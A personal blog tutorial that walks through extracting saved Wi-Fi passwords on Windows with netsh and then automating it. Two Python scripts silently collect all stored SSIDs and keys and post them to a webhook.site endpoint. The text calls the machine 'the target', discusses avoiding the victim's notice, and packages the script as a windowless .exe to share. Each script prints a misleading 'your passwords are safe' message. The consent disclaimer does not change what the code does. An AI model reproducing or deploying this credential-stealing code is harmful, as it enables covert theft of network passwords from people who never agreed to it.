Automating Wi-Fi Password Retrieval with Python Script & Webhook
Hey there, I am Aastha Thakker, and I’m excited to welcome you to my first blog. I’ll be sharing valuable insights regularly, and I hope you all will enjoy reading and supporting me on this journey. Thank you for joining me!
In this blog we are going to see Wi-Fi password retrieval through automation using Python and webhooks. It’s important to understand that this process is not hacking; rather, it’s about utilizing readily available technology and coding skills to access Wi-Fi passwords with proper authorization and consent.
Prerequisites
1. Python IDE
2. Basic Understanding of Webhooks
3. Googling Skills
A) Getting list and passwords using CMD
· Listing Wi-Fi Profiles:
At the core of this operation lies the ability to enumerate the Wi-Fi profiles saved on a Windows computer. To get the list of Wi-Fi profiles use this command in CMD.
netsh wlan show profiles
· Extracting Wi-Fi Passwords:
To get the password for particular Wi-Fi profile we use this command. You will get the password in “Key Content”.
netsh wlan show profiles name=”wifi_name” key=clear
B) Python Scripting for Automation
To automate these commands, we use python scripting. Python’s “subprocess” module allows us to interact with the command line directly from our script.
We create a Python script that systematically executes these commands on the user’s laptop, extracting the Wi-Fi profiles and their respective passwords and giving this as output.
import subprocess
import re
import json
import urllib.request
import urllib.error
# Function to run a command and suppress the Command Prompt window
def run_command(command):
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
return subprocess.run(command, capture_output=True, text=True, startupinfo=startupinfo)
# Function to get Wi-Fi profiles
def get_wifi_profiles():
# Get the list of Wi-Fi profiles using 'netsh wlan show profiles'
profiles_output = run_command(["netsh", "wlan", "show", "profiles"])
profiles = [line.split(":")[1].strip() for line in profiles_output.stdout.splitlines() if "All User Profile" in line]
# Create a dictionary to store Wi-Fi profile names and their keys
wifi_data = {}
# Loop through each Wi-Fi profile and extract its name and key
for profile in profiles:
profile_output = run_command(["netsh", "wlan", "show", "profile", "name=" + profile, "key=clear"])
name_match = re.search(r"Name\s+:\s+(.+)", profile_output.stdout)
key_match = re.search(r"Key Content\s+:\s+(.+)", profile_output.stdout)
if name_match and key_match:
profile_name = name_match.group(1)
key_content = key_match.group(1)
wifi_data[profile_name] = key_content
return wifi_data
# Function to send data to webhook
def send_to_webhook(data, webhook_url):
# Define headers and prepare JSON data
headers = {'Content-Type': 'application/json'}
data = json.dumps(data).encode('utf-8')
# Send the JSON data to the webhook using an HTTP request
req = urllib.request.Request(webhook_url, data=data, headers=headers)
try:
with urllib.request.urlopen(req) as response:
print("Your Wi-Fi Profile Names and Passwords are safe.")
except urllib.error.URLError as e:
print("Error sending the request:", e)
if __name__ == "__main__":
# Define the webhook URL (replace with your own)
webhook_url = "https://webhook.site/ae6c8f3b-9d2e-48e7-bdab-9a1e4a38db94"
# Get Wi-Fi profiles and send to webhook
wifi_profiles = get_wifi_profiles()
send_to_webhook(wifi_profiles, webhook_url)C) Using webhooks Server
Webhooks serve as a bridge for transmitting data from our Python script to a remote server. They provide a streamlined method for applications to communicate over the internet.
In our script, we integrate a webhook link that sends the output data to a specified endpoint. This enables us to remotely access the collected Wi-Fi profile information.
Challenges with this approach include:
1. The target computer needs to have Python and its working IDE installed.
2. The target may detect the operation due to signs like blinking or if they have basic coding knowledge.
To Overcome the challenge, try -
Converting Python (.py) to Executable (.exe): Sharing Python programs with others who don’t have Python installed? Convert your .py files to .exe format. Follow these steps:
1) Install the ‘pyinstaller’ library. Open your command prompt and run:
pip install pyinstaller
2) Navigate to the directory containing your .py file.
3) Hold the ‘Shift’ key and simultaneously right-click in the same directory to bring up a context menu.
4) Select ‘Open PowerShell window here’.
5) In the PowerShell window, run the following command, replacing ‘filename.py’ with your .py file’s name:
pyinstaller — onefile -w ‘filename.py’
6) Your directory structure should now include a ‘build’ folder. Feel free to delete it along with ‘.spec’ — they won’t affect your .exe file.
7) Open the ‘dist’ folder. Voilà! There’s your .exe file ready to share.
Now Open webhook link and you will be able to see the output. Points to focus on are highlighted.
Now, someone may raise a question that what if we have to make the code more compact and feasible? Is there any other way?
So, to answer your question, yes! There is another way by which you can use a single command in cmd and you will get the full output i.e., including Wi-Fi name, type, security, key content and everything in one go!
What’s That command?
for /f “skip=9 tokens=1,2 delims=:” %i in (‘netsh wlan show profiles’) do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
By using this command and modifying code a bit, you can send the full output to webhook server instead of just knowing the SSID and password.
import subprocess
import urllib.request
import urllib.error
# Function to run a command and return its output as a string
def run_command(command):
try:
output = subprocess.check_output(command, shell=True, text=True, stderr=subprocess.STDOUT)
return output
except subprocess.CalledProcessError as e:
return str(e.output)
# Function to send CMD output to webhook
def send_to_webhook(output, webhook_url):
# Define headers and prepare data
headers = {'Content-Type': 'text/plain'}
# Send the CMD output to the webhook using an HTTP request
req = urllib.request.Request(webhook_url, data=output.encode('utf-8'), headers=headers)
try:
with urllib.request.urlopen(req) as response:
print("Your Wi-Fi Profile Names and Passwords are safe.")
except urllib.error.URLError as e:
print("Error sending the request:", e)
if __name__ == "__main__":
# Define the webhook URL (replace with your own)
webhook_url = "https://webhook.site/ae6c8f3b-9d2e-48e7-bdab-9a1e4a38db94"
# Execute the provided CMD command and send the output to the webhook
cmd_command = 'for /f "skip=9 tokens=1,2 delims=:" %i in (\'netsh wlan show profiles\') do @echo %j | findstr -i -v echo | netsh wlan show profile %j key=clear'
cmd_output = run_command(cmd_command)
send_to_webhook(cmd_output, webhook_url)
So, what we did overall is, we started by manually extracting Wi-Fi profiles and their passwords from the CMD. To make things exciting, we automated this process using Python and posted the data on webhook. And then we created a more streamlined program that requires just one command to retrieve all Wi-Fi passwords and makes code more compact. So, use your newfound knowledge wisely, and may your internet connection always be strong!